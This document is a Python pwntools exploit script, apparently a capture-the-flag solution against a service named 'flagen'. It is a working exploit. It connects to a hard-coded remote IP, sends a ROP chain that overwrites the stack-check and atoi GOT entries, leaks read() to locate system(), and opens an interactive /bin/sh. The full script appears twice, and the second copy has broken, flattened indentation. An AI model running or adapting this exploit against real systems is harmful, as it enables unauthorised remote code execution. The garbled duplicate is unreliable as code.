ancat/exploit250.py

## exploit250.py
from pwn import *
import sys

lei = lambda x: struct.pack('I', x);
stack_chk = 0x0804B01C # location of stack_chk in the got
ret = 0x08048D89       # stack pivot (sub esp, 0x1c; pop; pop; pop; pop; ret;)

live = True

if live:
    r = remote('202.112.26.106', 5149)
    read_offset = 0xDABD0 # offset of read() into remote libc
    _system = 0x00040190  # offset of system() into remote libc
else:
    r = remote('localhost', 5556)
    read_offset = 0xDB460 # offset of read() in my libc
    _system = 0x00040100  # offset of system() in my libc

    # run ./g.sh to automagically attach gdb to the process currently processing my request
    x=open('g.sh', 'w'); x.write('#!/bin/sh\n'+"gdb -p %d -x gdbinit\n" % (proc.pid_by_name('flagen')[0]));x.close()
    raw_input("gdb -p %d -x gdbinit\n" % (proc.pid_by_name('flagen')[0]))

print r.recvuntil("Your choice: ")
r.send("1\n")

rop_chain = ''.join([
    lei(0x7c7c7c7c), # padding because of stack pivot
    lei(0x7c7c7c7c), # more padding because of stack pivot
    lei(0x08048510), # puts
    lei(0x08048d8e), # pop pop ret
    lei(0x0804b00c), # read@got.plt

    lei(0x44444444), # pad
    lei(0x080486CB), # read_input(their wrapper)
    lei(0x08048d8e), # pop pop ret
    lei(0x0804b03c), # destination (atoi@got.plt) where pointer to system goes
    lei(0x11111111), # bytes to read (integer needs to have no null bytes, doesn't really matter)

    lei(0x080486CB), # read_input(their wrapper)
    lei(0x08048d8e), # pop pop ret
    lei(0x0804B040), # the destination where our command string goes
    lei(0x11111111), # bytes to read

    lei(0x08048560), # atoi@plt (replaced with system)
    lei(0x44444444), # doesn't matter, /bin/sh is ours now
    lei(0x0804B040), # the place we wrote our command to
])

rop_chain = rop_chain + '|'*(77-len(rop_chain))
payload = lei(ret) + rop_chain + 'H'*65 + lei(stack_chk)

print len(rop_chain)
print len(payload + '\n')

assert(len(rop_chain) == 77)
assert(len(payload) <= 256)
r.send(payload + '\n')
raw_input("SENDING DA SPLOIT")
r.send('4\n')
r.recvuntil("Your choice: ")

read_addr = int("0x"+r.recvuntil("\n")[:4][::-1].encode('hex'),16)

print "read located at %x"%(read_addr)
new_system = read_addr-read_offset+_system
print "system is located at %x"%(new_system)
print "sending butt"
r.send(lei(new_system)+"\n")
r.send("/bin/sh\n")
print "sent butt"
r.interactive()
	from pwn import *
	import sys

	lei = lambda x: struct.pack('I', x);
	stack_chk = 0x0804B01C # location of stack_chk in the got
	ret = 0x08048D89 # stack pivot (sub esp, 0x1c; pop; pop; pop; pop; ret;)

	live = True

	if live:
	r = remote('202.112.26.106', 5149)
	read_offset = 0xDABD0 # offset of read() into remote libc
	_system = 0x00040190 # offset of system() into remote libc
	else:
	r = remote('localhost', 5556)
	read_offset = 0xDB460 # offset of read() in my libc
	_system = 0x00040100 # offset of system() in my libc

	# run ./g.sh to automagically attach gdb to the process currently processing my request
	x=open('g.sh', 'w'); x.write('#!/bin/sh\n'+"gdb -p %d -x gdbinit\n" % (proc.pid_by_name('flagen')[0]));x.close()
	raw_input("gdb -p %d -x gdbinit\n" % (proc.pid_by_name('flagen')[0]))

	print r.recvuntil("Your choice: ")
	r.send("1\n")

	rop_chain = ''.join([
	lei(0x7c7c7c7c), # padding because of stack pivot
	lei(0x7c7c7c7c), # more padding because of stack pivot
	lei(0x08048510), # puts
	lei(0x08048d8e), # pop pop ret
	lei(0x0804b00c), # read@got.plt

	lei(0x44444444), # pad
	lei(0x080486CB), # read_input(their wrapper)
	lei(0x08048d8e), # pop pop ret
	lei(0x0804b03c), # destination (atoi@got.plt) where pointer to system goes
	lei(0x11111111), # bytes to read (integer needs to have no null bytes, doesn't really matter)

	lei(0x080486CB), # read_input(their wrapper)
	lei(0x08048d8e), # pop pop ret
	lei(0x0804B040), # the destination where our command string goes
	lei(0x11111111), # bytes to read

	lei(0x08048560), # atoi@plt (replaced with system)
	lei(0x44444444), # doesn't matter, /bin/sh is ours now
	lei(0x0804B040), # the place we wrote our command to
	])

	rop_chain = rop_chain + '\|'*(77-len(rop_chain))
	payload = lei(ret) + rop_chain + 'H'*65 + lei(stack_chk)

	print len(rop_chain)
	print len(payload + '\n')

	assert(len(rop_chain) == 77)
	assert(len(payload) <= 256)
	r.send(payload + '\n')
	raw_input("SENDING DA SPLOIT")
	r.send('4\n')
	r.recvuntil("Your choice: ")

	read_addr = int("0x"+r.recvuntil("\n")[:4][::-1].encode('hex'),16)

	print "read located at %x"%(read_addr)
	new_system = read_addr-read_offset+_system
	print "system is located at %x"%(new_system)
	print "sending butt"
	r.send(lei(new_system)+"\n")
	r.send("/bin/sh\n")
	print "sent butt"
	r.interactive()